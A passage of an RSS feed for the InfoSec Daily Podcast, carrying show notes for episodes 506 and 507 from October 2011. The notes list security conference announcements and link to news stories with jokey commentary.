	As the name suggests, this website will ping the domain you entered from 50 locations from across the planet. Unless you see no &#8220;Okey&#8221; in the result, then that website is blocked in that location where the result comes out to be &#8220;Packets lost (100%)&#8221;.
	But most of the times the results are different every time it is checked, so you should check more than one time.
	Watch Mouse
	This one[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 507 &#8211; Weekly Wrap Up With Dr. B0n3z</title>
		<link>http://www.isdpodcast.com/episode-507-weekly-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-507-weekly-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 30 Oct 2011 19:13:48 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3045</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 507 for November 1, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. b0n3z and Boris Sverdlik. Guests: Aricon and Edison Carter Announcements: BsidesATL 2011 When: November 4th, 2011 Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg). http://www.securitybsides.com/w/page/44893559/BSidesATL-2011 This year there will be 3 tracks, a [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">InfoSec Daily Podcast Episode 507 for November 1, 2011. &nbsp;Tonight&#39;s podcast is hosted by Dr. b0n3z and Boris Sverdlik.</span></p>
<div style="background-color: transparent; ">
	<span style="font-size: 11pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Guests: Aricon and Edison Carter</span></p>
<p>	<span style="font-size: 11pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Announcements:</span></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size: 11pt; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">BsidesATL 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size: 11pt; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: November 4th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size: 11pt; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size: 11pt; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size: 11pt; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size: 11pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">SkyDogCon</span><br />
	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Phreaknic</span><br />
	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.phreaknic.info</span></a></p>
<p>
	<a href="http://www.phreaknic.info/"><span style="font-size: 11pt; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size: 11pt; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size: 11pt; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br />
	</span></a><span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Cost = FREE</span></p>
<p>	<span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2011 Fall Information Security Conference</span><br />
	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Atlanta, GA (Loudermilk Conference Center)<br />
	</span><a href="http://www.gaissa.org/"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">BSides Delaware</span><br />
	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: November 11-12, 2011</span><br />
	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: Starts November 30, 2011</span><br />
	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Atlanta, GA</span><br />
	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size: 11pt; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Stories:</span></p>
<p>	<span style="font-size: 11pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><a href="http://www.theregister.co.uk/2011/10/24/it_crowd_shuts_down/"><span style="font-size: 11pt; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://www.theregister.co.uk/2011/10/24/it_crowd_shuts_down/</span></a></p>
<p>	<span style="font-size: 11pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Nooooooooooooooooo!!!</span></p>
<p>	<span style="font-size: 11pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source: </span><a href="http://www.army.mil/article/68283/Army_sees_cyber_threats_as_imminent/"><span style="font-size: 11pt; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://www.army.mil/article/68283/Army_sees_cyber_threats_as_imminent/</span></a></p>
<p>	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Cyber Cyber Cyber! &nbsp;Get your shot glasses ready for this one.</span></p>
<p>	<span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source: </span><a href="http://www.reuters.com/article/2011/10/28/cybersecurity-india-idUSN1E79R1G020111028?irpc=932"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.reuters.com/article/2011/10/28/cybersecurity-india-idUSN1E79R1G020111028?irpc=932</span></a></p>
<p>	<span style="font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">India shuts server linked to Duqu computer virus</span></p>
<p>	<span style="font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><a href="http://www.neowin.net/news/google-over-190-million-android-devices-activated"><span style="font-size: 12pt; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://www.neowin.net/news/google-over-190-million-android-devices-activated</span></a></p>
<p>	<span style="font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Google math: Google doesn&#39;t sell phones, and their Android OS is FREE. Yet their mobile revenue was US$2.5 billion over last year. &nbsp;(That&rsquo;s a lot of zeros!)</span></p>
<p>	<span style="font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><a href="http://crypto.com/bingo/pr"><span style="font-size: 12pt; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://crypto.com/bingo/pr</span></a></p>
<p>	<span style="font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Security excuse BINGO. &nbsp;Need I say more really?</span></p>
<p>	<span style="font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><a href="http://www.theregister.co.uk/2011/10/26/fbi_secure_internet/"><span style="font-size: 12pt; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://www.theregister.co.uk/2011/10/26/fbi_secure_internet/</span></a></p>
<p>	<span style="font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">The FBI&rsquo;s plan for a newer, better and SECURE internet running&#8230;. &nbsp;the same software as everyone else. &nbsp;FAIL!</span></p>
<p>	<span style="font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source: </span><a href="http://arstechnica.com/gadgets/news/2011/10/facebook-sees-600000-compromised-logins-per-day006-of-all-logins.ars"><span style="font-size: 12pt; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://arstechnica.com/gadgets/news/2011/10/facebook-sees-600000-compromised-logins-per-day006-of-all-logins.ars</span></a></p>
<p>	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">600k phony logins per day!! &nbsp;Can FIS stop it? &nbsp;Also I&rsquo;m coining a phrase here &ldquo;recursive compromise&rdquo; based on this quote: &ldquo;Facebook acknowledged blocking roughly 600,000 logins per day, but argued that many of the compromised accounts are somehow compromised off of Facebook. &quot;There may be compromised accounts that appear on Facebook, but more often than not they are compromised off of Facebook&rdquo;</span></p>
<p>	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Did the thought ever occur that Facebook users might just be a bunch of drunks who forget their passwords all the time? &nbsp;Hmmm.</span></p>
<p>	<span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><a href="http://arstechnica.com/business/news/2011/10/arm-aims-for-the-server-room-with-its-new-64-bit-armv8-architecture.ars"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://arstechnica.com/business/news/2011/10/arm-aims-for-the-server-room-with-its-new-64-bit-armv8-architecture.ars</span></a><br />
	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">ARM your servers! &nbsp;Ha! &nbsp;Couldn&rsquo;t resist. &nbsp;Low power consumption and cost give this a pretty good chance at adoption. &nbsp;Are we paying the way for putting Android or ChromeOS in the server racks? &nbsp;Yikes!</span></p>
<p>	<span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><a href="http://www.msnbc.msn.com/id/45064201"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.msnbc.msn.com/id/45064201</span></a></p>
<p>	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Evil hackers are interfering with our satellites&#8230; &nbsp;For the love of god, go watch Real Genius right now if you have never seen it!!!</span></p>
<p>	<span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><a href="http://toool.us/deviant/"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://toool.us/deviant/</span></a></p>
<p>	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">They&#39;ve always been CopyLeft, but now all TOOOL lock diagrams are released in a single archive, with master PSD files.</span></p>
<p>	<span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source: </span><a href="https://www.networkworld.com/news/2011/102411-cyber-insurance-252145.html"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">https://www.networkworld.com/news/2011/102411-cyber-insurance-252145.html</span></a></p>
<p>	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Choices, choices&#8230; &nbsp;Should I buy more security guys or just up my cyber insurance policy? &nbsp;No wonder Infosec is failing. &nbsp;</span></p>
<p>	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">If this insurance didn&rsquo;t exist, might the c-levels take security more seriously? &nbsp;Furthermore, will the companies (foolishly?) providing this coverage survive the next Lulzsec-style attack? &nbsp;(Putting on my FUD-flinging gloves&#8230;)</span></p>
<p>	<span style="font-size: 11pt; background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><a href="https://www.infosecisland.com/blogview/17634-Six-Security-Assessments-Youve-Never-Had-But-Should.html"><span style="font-size: 11pt; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">https://www.infosecisland.com/blogview/17634-Six-Security-Assessments-Youve-Never-Had-But-Should.html</span></a></p>
<p>	<span style="font-size: 11pt; background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Six assessments you&rsquo;ve never had but might want to consider? &nbsp;&nbsp;We&rsquo;ll be the judge.</span></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-507-weekly-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3045/0/infosec-daily-podcast-episode-507.mp3" length="57737892" type="audio/mpeg" />
		<itunes:duration>1:00:07</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 507 for November 1, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. b0n3z and Boris Sverdlik.

	Guests: Aricon and Edison Carter
	Announcements:
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 507 for November 1, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. b0n3z and Boris Sverdlik.

	Guests: Aricon and Edison Carter
	Announcements:
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info

	BSidesDFW 2011
	When: November 5th, 2011
	Where:Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	Cost = FREE
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source:http://www.theregister.co.uk/2011/10/24/it_crowd_shuts_down/
	Nooooooooooooooooo!!!
	Source: http://www.army.mil/article/68283/Army_sees_cyber_threats_as_imminent/
	Cyber Cyber Cyber! &#160;Get your shot glasses ready for this one.
	Source: http://www.reuters.com/article/2011/10/28/cybersecurity-india-idUSN1E79R1G020111028?irpc=932
	India shuts server linked to Duqu computer virus
	Source:http://www.neowin.net/news/google-over-190-million-android-devices-activated
	Google math: Google doesn&#39;t sell phones, and their Android OS is FREE. Yet their mobile revenue was US$2.5 billion over last year. &#160;(That&#8217;s a lot of zeros!)
	Source:http://crypto.com/bingo/pr
	Security excuse BINGO. &#160;Need I say more really?
	Source:http://www.theregister.co.uk/2011/10/26/fbi_secure_internet/
	The FBI&#8217;s plan for a newer, better and SECURE internet running&#8230;. &#160;the same software as everyone else. &#160;FAIL!
	Source: http://arstechnica.com/gadgets/news/2011/10/facebook-sees-600000-compromised-logins-per-day006-of-all-logins.ars
	600k phony logins per day!! &#160;Can FIS stop it? &#160;Also I&#8217;m coining a phrase here &#8220;recursive compromise&#8221; based on this quote: &#8220;Facebook acknowledged blocking roughly 600,000 logins per day, but argued that many of the compromised accounts are somehow compromised off of Facebook. &#34;There may be compromised accounts that appear on Facebook, but more often than not they are compromised off of Facebook&#8221;
	Did the thought ever occur that Facebook users might just be a bunch of drunks who forget their passwords all the time? &#160;Hmmm.
	Source:http://arstechnica.com/business/news/2011/10/arm-aims-for-the-server-room-with-its-new-64-bit-armv8-architecture.ars
	ARM your servers! &#160;Ha! &#160;Couldn&#8217;t resist. &#160;Low power consumption and cost give this a pretty good chance at adoption. &#160;Are we paying the way for putting Android or ChromeOS in the server racks? &#160;Yikes!
	Source:http://www.msnbc.msn.com/id/45064201
	Evil hackers are interfering with our satellites&#8230; &#160;For the love of god, go watch Real Genius right now if you have never seen it!!!
	Source:http://toool.us/deviant/
	They&#39;ve always been CopyLeft, but now all TOOOL lock diagrams are released in a single archive, with master PSD files.
	Source: https://www.networkworld.com/news/2011/102411-cyber-insurance-252145.html
	Cho[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 506 &#8211; DC19 Videos, Odds 1/60 &amp; 1/100, Facebook Attachments, Little Orphan Android, FIS &amp; Got Pwn’d?</title>
		<link>http://www.isdpodcast.com/episode-506-dc19-videos-odds-160-1100-facebook-attachments-little-orphan-android-fis-got-pwn%e2%80%99d</link>
		<comments>http://www.isdpodcast.com/episode-506-dc19-videos-odds-160-1100-facebook-attachments-little-orphan-android-fis-got-pwn%e2%80%99d#comments</comments>
		<pubDate>Sat, 29 Oct 2011 00:52:54 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3039</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 506 for October 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangrajan, Geordy Rostad, and Dr. Bonez. Announcements: New Hampshire InfoSec Tweetup When: October 29, 2011 Where: Pawtuckaway State Park in Nottingham, NH http://nhinfosectweetup.eventbrite.com/ (It is just a gathering of security professionals and their families. &#160;No talks, [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 506 for October 28, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangrajan, Geordy Rostad, and Dr. Bonez. </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(It is just a gathering of security professionals and their families. &nbsp;No talks, just abunch of likeminded people and some good food.)</span></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
